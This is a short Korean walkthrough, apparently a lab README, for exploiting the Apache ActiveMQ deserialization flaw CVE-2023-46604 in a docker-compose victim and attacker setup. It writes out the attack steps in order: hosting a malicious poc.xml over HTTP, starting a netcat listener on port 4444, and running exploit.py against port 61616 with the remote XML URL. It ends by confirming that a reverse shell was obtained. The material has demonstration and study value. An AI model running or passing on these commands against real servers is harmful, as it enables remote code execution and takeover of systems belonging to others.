
CVE-2023-46604의 Apache ActiveMQ 익스플로잇으로, 조작된 XML 페이로드를 통한 원격 코드 실행과 리버스 셸 구축을 가능하게 합니다.
CVE-2023-46604

요구 환경에 따라 피해자 머신과 대상 머신으로 구성된 2개의 이미지를 포함하는 docker-compose를 구축합니다. 피해자 머신에서 ActiveMQ를 시작합니다.
공격자 머신으로 전환합니다: • HTTP 서비스를 열어 poc를 전송합니다: python3 -m http.server
• netcat을 사용하여 공격자 머신으로의 연결을 수신 대기합니다: nc -nlvp 4444
• 공격자 머신으로 리버스 셸 연결을 생성하는 payload를 전송합니다: python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml 여기서:
볼 수 있듯이, 'exploit.py' 파일을 실행하는 명령어를 호출한 후, 악용 코드는 웹 서버에 있는 'poc.xml' 패킷을 대상 서버에서 실행 중인 ActiveMQ 서비스의 주소로 전송합니다. 동시에 공격자 머신의 HTTP 웹 서버는 대상 머신의 IP 주소로부터 전송된 요청을 수신합니다.
payload 전송을 수행한 후, 공격자 머신의 포트 4444에서 수신 대기 중인 터미널로 전환합니다. 피해자 머신의 리버스 셸이 전송된 것을 확인할 수 있습니다.